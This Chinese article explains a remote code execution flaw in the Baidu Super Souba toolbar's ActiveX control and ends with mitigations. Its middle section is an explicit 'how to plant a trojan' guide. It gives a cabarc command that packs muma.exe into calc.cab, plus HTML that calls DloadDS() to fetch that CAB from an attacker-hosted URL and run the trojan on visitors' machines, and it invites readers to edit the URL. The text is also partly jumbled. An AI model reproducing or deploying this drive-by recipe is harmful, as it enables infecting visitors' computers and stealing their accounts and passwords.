别用百度超级搜霸漏洞黑我
网络安全
最近百度超级搜霸被曝其中的一个ActiveX控件中存在远程代码执行漏洞,利用该漏洞,各类恶意代码就可以在用户毫无察觉的情况下“暗度陈仓”,入侵我们的系统进而安装木马以及间谍程序盗取各类账号和密码。
一、漏洞形成原因
百度搜霸是一款基于ActiveX控件的浏览器工具栏,提供百度公司的各种服务。最近曝出的属于远程代码执行漏洞,如果一个安装了百度超级搜霸的用户访问了存在恶意代码的网站,则恶意脚本就可以在远程系统中执行任意的操作命令。
工具条控件安装后默认路径为C:\Program Files\baidu\bar\下,漏洞存在于由ActiveX控件“BaiduBar.dll”导出的“DloadDS()”函数中。
如果把其控件参数中bstrUrl设置成某个服务器上的CAB文件,DloadDS()函数会尝试下载这个文件到Temp目录并解压,然后执行其中的控件参数中bstrName命名的文件,此时控件参数lpCommandLine指向“C:\DOCUME~1\administrator\LOCALS~1\Temp\calc.exe”。
由于之前没有任何有效的检查措施,因此黑客可构造包含木马或者间谍程序的CAB文件,然后用DloadDS()函数下载并运行它。
二、漏洞的危害有多大
百度超级搜霸有这样一个能执行任意代码的漏洞,就相当于给每台安装了此工具条的电脑用户留了一个完美的后门。
目前安装有百度超级搜霸的朋友也比较多,所以当这个工具条的控件漏洞被黑客利用后,黑客就可以轻松地将病毒木马程序种植到用户的电脑中并激活运行。恶意代码的内容不同,造成的危害也不同,轻则使电脑系统瘫痪,重则盗取用户的游戏账号及装备、网络银行账号密码等,给用户造成巨大的经济损失。
小提示:百度超级搜霸控制漏洞的危害程度判断是参照标准的高危害漏洞(腾讯QQ漏洞)和标准的中等危害漏洞(卡巴斯基漏洞)。
三、如何利用漏洞种马
要利用该漏洞,需要用到CABARC.EXE(CAB文件封装器),它需要在MSDOS模式下运行。
小知识:CAB文件是什么?在微软的程序发展中,压缩文件是个包括很多文件的单一文件。使用的时候,先对压缩文件进行解压缩,解压缩的文件就拷贝在一个适当的位置,压缩文件的后缀通常为“*.cab”。
第一步:由于该漏洞最终的目的是下载设置的木马程序,除了事先配置好一个木马服务端程序外,我们还需要利用CAB封装器将这个木马封装起来。我们先将CAB文件封装器“CABARC.EXE”及配置好的木马文件“muma.exe”都放在D盘根目录下,然后打开“命令提示符”窗口,进入到D盘盘符下,运行命令如下:
cabarc n calc.cab muma.exe
calc.cab是封装后的文件,muma.exe则是需要封装的文件,封装成功会提示“Completed successfully”(顺利完成)(图1)。
第二步:在D盘根目录下新建一个文本文件或记事本文件,输入下面的代码:
<html>
<head>
Function DowndloadCalcAndRun() { Com.DloadDS("http://www.***.com/calc.cab","muma.exe",0); } </script> </head> <OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E356E9E9}"> </OBJECT> <script> DowndloadCalcAndRun() </script> </html> 将它另存为index.htm网页文件即可,也可以将此段代码加入到网站某个网页文件代码中。 小提示:在Com.DloadDS("http://www.***.com/calc.cab","muma.exe",0);这句里http://www.***.com/calc.cab是木马的下载地址,muma.exe是木马名称,根据需要进行修改。 第三步:将封装好的“calc.cab”及加入了代码的网页文件“index.htm”上传到服务器或是网页空间中,只要是使用了百度超级搜霸的用户访问了这个index.htm网页,其工具条控件的DloadDS()函数会自动下载calc.cab这个文件到Temp目录并解压,然后执行muma.exe,这样黑客就可以成功地利用木马程序控制操作(图2)。 方案1:最简便的方法就是将它卸载并使用其它浏览器。单击工具条左边的LOGO,在弹出的菜单中选择“卸载”命令,在弹出的“工具栏卸载”对话框中勾选原因后单击“卸载”按钮,然后重启(图3)。 不过由于其软件自身卸载并不能完全清除,所以我们还需要利用《360安全卫士》中“清理恶评及系统插件”来对系统进行扫描,扫描过后勾选“百度超级搜霸”和“百度搜索伴侣”二个插件,然后单击“立即清理”对这款插件进行清除,清除时软件会提示需要重新启动才能彻底清除,单击“马上重启”即可(图4)。 方案2:将百度超级搜霸进行卸载这种方法有点极端,如果朋友们必须要使用这款插件的话,在这里我就给大家推荐两种方法来进行其控件漏洞的防范。 这里以笔者使用的McAfee VirusScan为例进行讲解,单击右下角的“McAfee VirusScan”图标,在弹出的菜单中选择“VirusScan控制台”命令,在打开的“VirusScan控制台”双击“访问保护”打开其属性设置对话框。 在“文件、共享资源和文件夹保护”选项卡中勾选要阻挡的文件和文件夹选项,比如勾选“禁止从Temp文件夹执行脚本”、“禁止WinRAR从Temp文件夹启动任何项目”,确定后开启访问保护,这样只要这款杀毒软件存在,超级搜霸即使从网上下载了一些病毒和木马到Temp文件夹中,也无法利用WinRAR解压缩并运行,保护了我们电脑的安全(图5)。 由于百度超级搜霸是利用CAB文件来进行木马的封装下载的,这里我们以MyIE为例来教大家利用其它浏览器过滤CAB内容,达到阻止病毒木马下载的目的。 首先打开MyIE,选择菜单“工具→TheWorld选项”,再选择“更多设置”打开“世界浏览器”设置对话框,在“过滤”选项卡中网页内容过滤,在过滤内容中加上“calc.cab”,确定即可,以后只要坚持使用这款浏览器上网就不会为百度超级搜霸的控件漏洞烦恼了。 如果上网需求简单,一般不会用到什么插件的话,可以使用最极端的办法,在网页内容过滤里加上*.cab,这样的话,不管是哪个插件也烦不了你了(图6)。
四 漏洞的防范方案
1.利用杀毒软件限制Temp文件夹程序运行
2.利用浏览器网页内容过滤CAB
